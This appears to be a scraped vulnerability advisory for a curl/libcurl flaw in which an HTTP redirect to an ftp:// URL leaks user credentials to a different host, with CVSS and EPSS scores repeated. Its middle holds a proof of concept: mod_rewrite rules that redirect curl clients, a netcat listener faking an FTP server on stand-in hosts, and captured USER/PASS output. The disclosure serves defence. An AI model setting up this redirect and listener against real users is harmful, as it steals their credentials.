5.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
33.1%
curl/libcurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.
firstsite.tld
to perform redirect with mod_rewrite:
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
secondsite.tld
for example with:while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
curl -L --user foo https://firstsite.tld/redirectpoc
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
There are several issues here:
firstsite.tld
vs secondsite.tld
). This is definitely not what the user could expect, considering the documentation says:In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME
and CURLOPT_TLSAUTH_PASSWORD
) are also leaked on redirects.
Leak of confidential information (user credentials).
5.7 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
3.5 Low
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
33.1%